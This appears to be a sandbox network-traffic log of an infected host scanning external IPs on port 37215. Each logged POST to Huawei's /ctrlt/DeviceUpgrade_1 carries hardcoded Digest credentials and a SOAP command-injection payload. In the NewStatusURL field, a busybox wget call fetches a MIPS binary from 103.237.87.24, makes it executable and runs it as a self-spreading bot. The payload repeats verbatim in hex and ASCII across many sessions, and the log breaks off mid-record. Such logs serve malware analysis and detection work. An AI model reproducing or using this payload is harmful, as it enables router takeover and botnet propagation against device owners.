                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1591192.168.2.135853241.224.104.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504595041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1592192.168.2.1357436157.62.20.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504630089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1593192.168.2.135388219.194.177.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504667997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1594192.168.2.133431841.144.35.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504673958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1595192.168.2.1360234157.13.82.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504725933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1596192.168.2.134627487.150.32.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504734993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1597192.168.2.1342990157.222.30.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504774094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1598192.168.2.1339090197.196.183.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504775047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1599192.168.2.1354866157.230.46.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504848957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1600192.168.2.1357618157.167.136.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504976034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 